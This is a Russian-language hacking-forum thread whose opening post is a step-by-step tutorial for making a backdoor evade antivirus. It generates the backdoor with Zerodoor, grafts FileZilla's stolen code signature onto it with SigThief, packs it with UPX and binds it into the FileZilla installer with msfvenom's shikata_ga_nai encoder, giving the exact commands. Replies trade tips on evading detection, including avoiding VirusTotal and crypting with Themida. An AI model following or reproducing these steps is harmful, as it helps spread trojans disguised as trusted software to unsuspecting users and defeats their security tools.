Статья Прячем свой Бэкдор

Введение
Всем привет, на форуме появился не давно. Читая статьи всегда хотелось взять и самому что-то написать. И конечно как и многие из нас (форумчан) хочется попась в Grey и выше, а что бы туда попасть надо писать свои статьи. Что я сегодня и решил сделать. В течении 3 дней читал, переводил и усваивал информацию о том как спрятать свой плохой хороший код. Да, результат не идеален, но все же

Результат

Скажу честно это мой лучший результат )

Основная часть

Для всего процесса нам понядобятся :

Tools

Zerodoor - https://github.com/Souhardya/Zerodoor
SigThief - https://github.com/secretsquirrel/SigThief
UPX - apt install
upx
msfvenom

Сам процесс
( как установить объяснять не буду, с этим проблем возникнуть не должно ; )
Создаем бэкдор в Zerodoor. Заходим в репозиторий тулзы и запускаем

Запуск

Запустили программу и выбираем нужные пункты :

Шаги Zerodoor

тут ваш ip , что бы узнать ip вводим ifconfig

Все мы создали бэкдор и теперь надо его сделать почти чистым )
Для этого первым делом подделеам подпись. У нашего только что созданного бекдора не будет никакой подписи, а вот в официальных программах она есть. Я буду использовать подпись установочного файла FileZilla. Чтобы проверить наличие подписи даем команду :

Видим наличие подписи и это то что нам нужно )
Теперь нам нужно приделать эту подпись нашему файлу

 python sigthief.py -i /opt/payload/FileZilla_3.30.0_win64-setup_bundled.exe -t /opt/Zerodoor/backdoor.exe -o /opt/payload/windowsproga.exe

-i - путь до файла с подписью
-t - путь до нашего файла
-o - путь до нашего будующего файла

Все подпись подделана. Теперь сожмем файл спомощью UPX

upx -5 /путь до файла

Все программа сжата, отлично ) Теперь было бы хорошо что бы наш виндовспрога не вызывал подозрений для этого мы соеденим его с установшиком FileZilla

msfvenom -a x86 --platform Windows  -e x86/shikata_ga_nai --format=exe -x /opt/payload/FileZilla_3.30.0_win64-setup_bundled.exe -o /opt/payload/payload/windowsproga.exe -k 5

Эта была моя первая статья на форуме, всем спасибо, жду вашей реакции)

 

[OneDollar]

Интересно, а ты часом по факту Касперским не проверял? Потому что у меня билд на сайте показывает, что Касперскому на него насрать, но в итоге " обнаружено".
p.s. билд генерил другим способом

 

[Kaotina]

Интересно, а ты часом по факту Касперским не проверял? Потому что у меня билд на сайте показывает, что Касперскому на него насрать, но в итоге " обнаружено".
p.s. билд генерил другим способом

Проверить антивирусом возможности не было Ось линукс, а винду качать и ставить при скорости инета 0.4 мб/с долговато.Проверял на этом сайте (который на скринах) и на вирустотал еще для сравнения

 

[n01n02h]

У меня может андроид такой, но все билды которые делал, через pupy, venom, др веб даже не замечает

 

[The ROOT]

Да забудьте вы про вирустотал вообще! Нельзя там чекать свои файлы, используйте viruscheckmate или если жалко денег на nodistribute, но у него базы старее чем у первого.

Кстати результат будет намного лучше, если использовать Resource Hacker в связке с TheMida, каждый день по несколько раз приходится так делать, результат на чекмейт 2-4 детекта, такой-же и рантайм результат

 

[Kaotina]

Да забудьте вы про вирустотал вообще! Нельзя там чекать свои файлы, используйте viruscheckmate или если жалко денег на nodistribute, но у него базы старее чем у первого.

Кстати результат будет намного лучше, если использовать Resource Hacker в связке с TheMida, каждый день по несколько раз приходится так делать, результат на чекмейт 2-4 детекта, такой-же и рантайм результат

Да про вирустотал наслышал многое, да знаю что сливает инфу АВ компаниям, но я все делал лично для себя, поэтому чисто для сверки проверил на ВТ

---- Automatically Merged Double Post ----

У меня может андроид такой, но все билды которые делал, через pupy, venom, др веб даже не замечает

может у тебя доктор не такой ?)

 

[n01n02h]

Да про вирустотал наслышал многое, да знаю что сливает инфу АВ компаниям, но я все делал лично для себя, поэтому чисто для сверки проверил на ВТ

---- Automatically Merged Double Post ----


может у тебя доктор не такой ?)

все может

 

[kamaz]

Да про вирустотал наслышал многое, да знаю что сливает инфу АВ компаниям, но я все делал лично для себя, поэтому чисто для сверки проверил на ВТ

---- Automatically Merged Double Post ----


может у тебя доктор не такой ?)

да и сигнатуру тулзы твоей которой пайлоад генериш.
мне панравилось твоя писанина пиши ишо

 

[arees]

Да бред палится абсолютно всеми антивирусами если тотал и пропускает то на самом хосте даже avg ругается, а по поводу shikata_ga_nai стандартные крипторы лучше вообще не использовать многие палят именно по их сигнатуре

 

[Kaotina]

Да бред палится абсолютно всеми антивирусами если тотал и пропускает то на самом хосте даже avg ругается, а по поводу shikata_ga_nai стандартные крипторы лучше вообще не использовать многие палят именно по их сигнатуре

Не сказал бы, знакомый тестил на своем компе (виндовс 7 антивир "AVG") зашла на ура, и еще заметил такую вещь ( ав был AVAST) если на момент запуска антивир отключить, а потом включить, то антивирус тупо не мог удалить файл до тех пор пока ты не отключишься.
ты имеется ввиду атакующий

 

[arees]

Не сказал бы, знакомый тестил на своем компе (виндовс 7 антивир "AVG") зашла на ура, и еще заметил такую вещь ( ав был AVAST) если на момент запуска антивир отключить, а потом включить, то антивирус тупо не мог удалить файл до тех пор пока ты не отключишься.
ты имеется ввиду атакующий

ну в этом весь и смысл "если отключить" а если не отключать ))) у меня не один не пропустил кроме касперского ну при создании сессии касперский сразу ругнулся и все почистил а если эвристический типо norton он сразу удаляет файл целиком так что не панацея увы

 

[mrOkey]

Тема года 16ого вы чего хотите?

 

[Kaotina]

Тема года 16ого вы чего хотите?

Я конечно все понимаю вы этой информацией владели 16 году, вы молодец! Но надо помнить что помимо вас есть другие люди, которые только не давно узнали.
А если у вас есть новая информация, то попрощу вас поделиться, так как может быть, что я наткнусь на это через года 2-3. И что бы вы не написали " Тема года 18ого вы чего хотите?" )

 

[Дядюшка Рик]

на себе нужно проверять =)всё это и не бояться же это твоё творение и не чужое)

 

[kot-gor]

Молодцом нормальная статья...особенно полезна для начинающих.

 

[mrOkey]

Я конечно все понимаю вы этой информацией владели 16 году, вы молодец! Но надо помнить что помимо вас есть другие люди, которые только не давно узнали.
А если у вас есть новая информация, то попрощу вас поделиться, так как может быть, что я наткнусь на это через года 2-3. И что бы вы не написали " Тема года 18ого вы чего хотите?" )

Я это к жалобам о том, что палится

 

[Kaotina]

Я это к жалобам о том, что палится

Пора бы мне перестать читать сообщения с низу вверх )

 

[Generichack]

Посмотреть вложение 15765
Введение
Всем привет, на форуме появился не давно. Читая статьи всегда хотелось взять и самому что-то написать. И конечно как и многие из нас (форумчан) хочется попась в Grey и выше, а что бы туда попасть надо писать свои статьи. Что я сегодня и решил сделать. В течении 3 дней читал, переводил и усваивал информацию о том как спрятать свой плохой хороший код. Да, результат не идеален, но все же

Результат

Посмотреть вложение 15750

Скажу честно это мой лучший результат )

Основная часть

Для всего процесса нам понядобятся :

Tools

Zerodoor - Souhardya/Zerodoor
SigThief - secretsquirrel/SigThief
UPX - apt install
upx
msfvenom

Сам процесс
( как установить объяснять не буду, с этим проблем возникнуть не должно ; )
Создаем бэкдор в Zerodoor. Заходим в репозиторий тулзы и запускаем

Запуск

Посмотреть вложение 15752

Запустили программу и выбираем нужные пункты :

Шаги Zerodoor

Посмотреть вложение 15753
Посмотреть вложение 15756Посмотреть вложение 15757
тут ваш ip , что бы узнать ip вводим ifconfig
Посмотреть вложение 15758

Все мы создали бэкдор и теперь надо его сделать почти чистым )
Для этого первым делом подделеам подпись. У нашего только что созданного бекдора не будет никакой подписи, а вот в официальных программах она есть. Я буду использовать подпись установочного файла FileZilla. Чтобы проверить наличие подписи даем команду :

Посмотреть вложение 15759
Видим наличие подписи и это то что нам нужно )
Теперь нам нужно приделать эту подпись нашему файлу

 python sigthief.py -i /opt/payload/FileZilla_3.30.0_win64-setup_bundled.exe -t /opt/Zerodoor/backdoor.exe -o /opt/payload/windowsproga.exe

-i - путь до файла с подписью
-t - путь до нашего файла
-o - путь до нашего будующего файла

Посмотреть вложение 15760

Все подпись подделана. Теперь сожмем файл спомощью UPX

upx -5 /путь до файла

Посмотреть вложение 15761

Все программа сжата, отлично ) Теперь было бы хорошо что бы наш виндовспрога не вызывал подозрений для этого мы соеденим его с установшиком FileZilla

msfvenom -a x86 --platform Windows  -e x86/shikata_ga_nai --format=exe -x /opt/payload/FileZilla_3.30.0_win64-setup_bundled.exe -o /opt/payload/payload/windowsproga.exe -k 5

Посмотреть вложение 15762

Эта была моя первая статья на форуме, всем спасибо, жду вашей реакции)

При запуске -

 

[OneDollar]

При запуске -

Посмотреть вложение 18468

Попробуй без использования подписей

 

[Generichack]

Попробуй без использования подписей

Попробовал, но к сожалению эффекта не достиг... А жаль..